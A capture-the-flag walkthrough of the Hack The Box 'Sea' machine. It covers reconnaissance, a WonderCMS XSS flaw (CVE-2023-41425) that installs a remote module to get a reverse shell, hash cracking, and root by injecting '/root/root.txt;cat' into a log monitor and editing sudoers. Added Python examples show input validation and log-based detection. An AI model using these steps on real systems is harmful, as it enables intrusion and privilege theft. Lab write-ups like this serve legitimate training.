Introduction to Sea:

This write-up will explore the “Sea” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Sea” machine from Hack The Box by achieving the following objectives:

User Flag:

CVE-2023-41425 Exploitation:

This machine is exposed to CVE-2023-41425, a Cross-Site Scripting (XSS) issue found in Wonder CMS versions 3.2.0 to 3.4.2. The vulnerability allows an attacker to inject malicious scripts remotely.

Impact of the Exploit:

By exploiting this flaw, an attacker can upload a carefully crafted script to the installModule component, executing arbitrary code and potentially compromising the system’s integrity.

Root Flag:

System Detection and Log Activity:

The system seems to be monitoring for “suspicious content” in certain paths. While we cleared the “apt” logs, the access.log file was not fully cleared, containing traces of malicious activity from previous brute-forcing attempts. However, the access.log is now “empty,” indicating that filtering mechanisms are likely in place to track and block certain actions.

Privilege Escalation Detection:

When testing with “/root/root.txt” as the log_file parameter, the system successfully detected the file, possibly indicating that it was accessed with root privileges. This suggests that the system is actively filtering attempts to access sensitive files or escalate privileges.

Enumerating the Sea Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.


nmap -sC -sV -oN nmap_initial.txt 10.10.11.28

Nmap Output:

┌─[darknite@parrot]─[~/Documents/htb/sea]
└──╼ $nmap -sC -sV 10.10.11.28 -oA initial
# Nmap 7.94SVN scan initiated Mon Aug 12 18:42:25 2024 as: nmap -sC -sV -oA initial 10.10.11.28
Nmap scan report for 10.10.11.28 (10.10.11.28)
Host is up (0.053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Sea - Home
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 12 18:42:33 2024 -- 1 IP address (1 host up) scanned in 8.09 seconds 

Analysis:

  • Port 22 (SSH): Secure Shell service (OpenSSH 8.2p1) for remote access on Ubuntu.
  • Port 80 (HTTP): Apache web server (2.4.41) hosting the “Sea – Home” website on Ubuntu.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.


gobuster dir -u http://sea.htb -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt

Gobuster Output:

Analysis:

The scan of the root directory reveals four subdirectories:

  • data
  • messages
  • plugins
  • themes

I noticed a particular directory that stood out to me.

Exploitation

Web Application Exploration:

After exploring each web service page, I noticed that “contact.php” stands out due to its form. We suspect the “Website” field may be susceptible to XSS or CSRF attacks.

Let’s provide some input to check for any valuable information.

Nothing stands out significantly.

However, we can confirm that the form was successfully submitted to the server.

Nothing stands out at all.

The /themes/bike/version endpoint discloses the theme version used by the CMS.

README.md revealed the application being used in the system.

WonderCMS bike theme enumeration

What is CVE-2023-41425?

CVE-2023-41425 is a Cross-Site Scripting (XSS) vulnerability found in Wonder CMS versions 3.2.0 to 3.4.2. This flaw allows a malicious actor to inject harmful scripts into the website, potentially enabling them to steal user data, hijack sessions, or carry out other malicious activities.

How does CVE-2023-41425 work?
The vulnerability is present in the installModule component of Wonder CMS. An attacker can upload a specially crafted script to this component, which, when executed, lets them inject malicious code into the website.

There is some information that is useful to us, particularly for further escalation. The source for the matter can be found here.

Let’s attempt the exploit I discovered on the GitHub page.

Exploit code analysis

This code is a malicious script designed to exploit a vulnerability in a website running WonderCMS. Here’s a breakdown of what it does in simpler terms:

  1. Extracting information: The script starts by getting the URL of the site (the web address). It then removes the trailing slash and strips away the part of the URL related to the login page to focus on the main part of the site’s address.
  2. Grabbing a security token: It finds a security token (a piece of data that proves a user is authenticated) on the page. This token is needed for the exploit to work, as it helps make the request seem legitimate.
  3. Triggering the malicious install: The script then constructs a URL that points to a malicious file (rev.zip) hosted on the attacker’s server. It tricks the CMS into thinking this file is a valid module to install, using the token for authentication. The CMS will then download and install the file without proper checks.
  4. Calling a reverse shell: After the malicious file is installed, the script tries to run a PHP script (rev.php) from the installed module. This script connects back to the attacker’s machine and opens up a “reverse shell,” which is a way for the attacker to control the website remotely.
  5. Connecting to the attacker: Finally, the script sends information about the attacker’s machine (like the IP address and port number) to set up a connection, allowing the attacker to gain control over the server.

WonderCMS function that we need to understand

The installUpdateModuleAction function in WonderCMS is responsible for managing the installation or updating of themes and plugins. It begins by validating user input and checking for the presence of the installModule and type parameters in the request. The function then proceeds to download the required zip file, extract its contents, and install the module into the specified directory. It incorporates error handling to address issues such as download failures, zip extraction problems, and directory manipulation errors. Finally, it provides the user with feedback regarding the outcome of the installation.

In essence, if the URL contains a zip file link in the installModule parameter and a folder path in the type parameter, the CMS will automatically download and install the specified content without further validation.
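As an added illustration of the missing validation just described (this is not WonderCMS's own code), the following Python handler checks the installModule, type and token parameters before any download is attempted. The host allow-list, the function names and the session-token source are assumptions.

```python
import hmac
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Hypothetical allow-list of hosts an administrator may install modules from.
ALLOWED_HOSTS = {"github.com", "raw.githubusercontent.com"}
# The only two install locations the `type` parameter may name.
ALLOWED_TYPES = {"themes", "plugins"}


def validate_install_request(install_module: str, type_: str,
                             token: str, session_token: str) -> tuple:
    """Check an installModule/type/token request before any download happens.

    Returns (ok, reason). Each check is one the weak handler described above
    skips: it trusts the token alone and fetches whatever URL it is given.
    """
    # 1. The request token must equal the session's token; compare in constant time.
    if not token or not hmac.compare_digest(token, session_token):
        return False, "bad or missing token"

    # 2. `type` is an exact allow-list match, so it can never carry a path.
    if type_ not in ALLOWED_TYPES:
        return False, f"type {type_!r} not allowed"

    # 3. Only https downloads from allow-listed hosts; an attacker-controlled
    #    host (a bare IP, a lookalike domain) fails here.
    u = urlparse(install_module)
    if u.scheme != "https":
        return False, "scheme must be https"
    host = (u.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not allow-listed"

    # 4. The archive must be a plain .zip path with no traversal components.
    path = PurePosixPath(u.path)
    if path.suffix.lower() != ".zip" or ".." in path.parts:
        return False, "path must be a plain .zip"

    return True, "ok"


def module_dir_name(install_module: str) -> str:
    """Derive the on-disk module directory from the archive name alone,
    never from a user-supplied directory parameter."""
    name = PurePosixPath(urlparse(install_module).path).stem
    # Keep only characters that are safe in a directory name.
    safe = "".join(c for c in name if c.isalnum() or c in "-_")
    if not safe:
        raise ValueError("archive name yields no usable directory name")
    return safe


if __name__ == "__main__":
    print(validate_install_request(
        "https://203.0.113.10/rev.zip", "themes", "tok", "tok"))
    print(validate_install_request(
        "https://github.com/org/theme/archive/main.zip", "themes", "tok", "tok"))
```

The ordering matters: the token check comes first so that an unauthenticated caller learns nothing about which hosts or types the server accepts, and the directory name is derived from the archive rather than from the request, which removes the second user-controlled path the write-up describes.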

Another exploit script on Sea machine

Let’s run the exploit on our machine and use the XSS payload to trigger the reverse shell callback.

Unfortunately, nothing happened after waiting for a few minutes. As a result, let’s change the exploit code to another script, which can be found here.

Surprisingly, it worked like a charm.

We have access to it with a www-data shell.

Shell as AMAY user access on Sea machine

After exploring the victim’s machine, we found a database containing a hash that we could attempt to crack.

We have successfully obtained the password, but we are unsure which user it belongs to.

We can view the user flag by running the “cat user.txt” command.

Escalate to Root Privileges Access on Sea Machine

Privilege Escalation:

It is important to verify other open ports on the machine in addition to those identified by Nmap.

Let’s set up port forwarding using port 8080.

Let’s enter the credentials as Amay here.

It appears to be a System Monitor, as shown above.

The access.log will appear similar to the example shown above.
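The write-up notes that access.log carried traces of earlier brute-forcing and that the host appears to watch for suspicious content. As an added example (not from the machine or the CMS), the following Python script parses Apache-style access.log lines and flags the two patterns this machine exhibits: a module install whose installModule URL points at a host outside an allow-list, and repeated rejected POSTs to one path from one client. The log lines, the allow-list, the /login path and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-log style lines; not taken from the Sea machine.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Aug/2024:18:50:01 +0000] "GET / HTTP/1.1" 200 5123
203.0.113.10 - - [12/Aug/2024:18:50:05 +0000] "POST /login HTTP/1.1" 403 512
203.0.113.10 - - [12/Aug/2024:18:50:06 +0000] "POST /login HTTP/1.1" 403 512
203.0.113.10 - - [12/Aug/2024:18:50:07 +0000] "POST /login HTTP/1.1" 403 512
203.0.113.10 - - [12/Aug/2024:18:50:08 +0000] "POST /login HTTP/1.1" 403 512
203.0.113.10 - - [12/Aug/2024:18:50:09 +0000] "POST /login HTTP/1.1" 403 512
198.51.100.7 - - [12/Aug/2024:18:51:00 +0000] "GET /themes/bike/version HTTP/1.1" 200 6
198.51.100.7 - - [12/Aug/2024:18:52:30 +0000] "GET /?installModule=https://198.51.100.7/rev.zip&type=themes&token=abcd HTTP/1.1" 200 1024
192.0.2.44 - - [12/Aug/2024:18:53:00 +0000] "GET /?installModule=https://github.com/org/theme/archive/main.zip&type=themes&token=abcd HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Hosts from which a module download is expected; anything else is flagged.
ALLOWED_MODULE_HOSTS = {"github.com", "raw.githubusercontent.com"}
BRUTE_FORCE_THRESHOLD = 5


def parse_line(line: str) -> Optional[dict]:
    """Split one access.log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text: str) -> list:
    """Return (rule, client_ip, detail) findings over the given access.log text."""
    findings = []
    failed_posts = Counter()  # (ip, path) -> number of 4xx POSTs seen

    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlparse(rec["target"])
        qs = parse_qs(url.query)

        # Rule 1: a module install pointing at a host outside the allow-list.
        for module_url in qs.get("installModule", []):
            host = (urlparse(module_url).hostname or "").lower()
            if host not in ALLOWED_MODULE_HOSTS:
                findings.append(("remote_module_install", rec["ip"],
                                 f"installModule from {host or '?'} "
                                 f"type={qs.get('type', ['?'])[0]}"))

        # Rule 2: repeated rejected POSTs to the same path from one client.
        if rec["method"] == "POST" and rec["status"].startswith("4"):
            key = (rec["ip"], url.path)
            failed_posts[key] += 1
            if failed_posts[key] == BRUTE_FORCE_THRESHOLD:
                findings.append(("possible_brute_force", rec["ip"],
                                 f"{BRUTE_FORCE_THRESHOLD} rejected POSTs to {url.path}"))
    return findings


if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_LOG):
        print(f"{rule:24} {ip:16} {detail}")
```

Run against a real access.log, rule 1 is the higher-value signal: a legitimate administrator installs modules rarely and from a known origin, so a single installModule request naming any other host is worth an alert on its own, which is also why clearing the log is such an attractive step for an intruder and why the log should be shipped off-host.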

The response captured in Burp Suite is shown above.

We can view the root flag by injecting the “/root/root.txt;cat” command.

I was considering a similar approach: “Grant Amay sudo privileges.” Proceed by updating the payload to modify the sudoers file.

It was successfully executed.
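The root step works because the monitor passes its log_file parameter into a shell command and runs with root privileges, so a “;” in the value runs a second command. As an added example (not the monitor's actual code, whose language the write-up does not state), the following Python shows that weak pattern beside a hardened reader that maps the parameter through an exact allow-list and never invokes a shell. The log directory, file names and function names are assumptions.

```python
import subprocess
from pathlib import Path

# Hypothetical log directory and the exact file names the monitor may show.
LOG_DIR = Path("/var/log/apache2")
ALLOWED_LOGS = {"access.log", "error.log"}


def vulnerable_read(log_file: str) -> str:
    """Weak pattern: the parameter is spliced into a shell command line, so a
    value containing ';' runs a second command. Shown only for contrast."""
    return subprocess.run(f"cat {log_file}", shell=True,
                          capture_output=True, text=True).stdout


def resolve_log_path(log_file: str, base: Path = LOG_DIR) -> Path:
    """Map a log_file parameter to a file under `base`, or raise ValueError."""
    # Exact allow-list match: separators, metacharacters and traversal cannot get through.
    if log_file not in ALLOWED_LOGS:
        raise ValueError(f"log_file {log_file!r} is not an allowed log name")
    path = (base / log_file).resolve()
    # Belt and braces: the resolved file must sit directly inside the base directory.
    if path.parent != base.resolve():
        raise ValueError("resolved path escapes the log directory")
    return path


def read_log(log_file: str, base: Path = LOG_DIR, max_lines: int = 200) -> str:
    """Return the last `max_lines` lines of an allowed log without invoking a shell."""
    path = resolve_log_path(log_file, base)
    with path.open("r", errors="replace") as fh:
        lines = fh.readlines()
    return "".join(lines[-max_lines:])


if __name__ == "__main__":
    for candidate in ("access.log", "/root/root.txt;cat", "../../../etc/passwd"):
        try:
            print(candidate, "->", resolve_log_path(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

Two design points follow from the write-up. First, the allow-list is a set of names rather than a denylist of characters, so there is nothing to bypass with encoding or alternative separators. Second, even a correct reader should not run as root: a monitor that only needs the web server's logs can run as a dedicated account, and then neither root.txt nor the sudoers file would have been readable or writable through it.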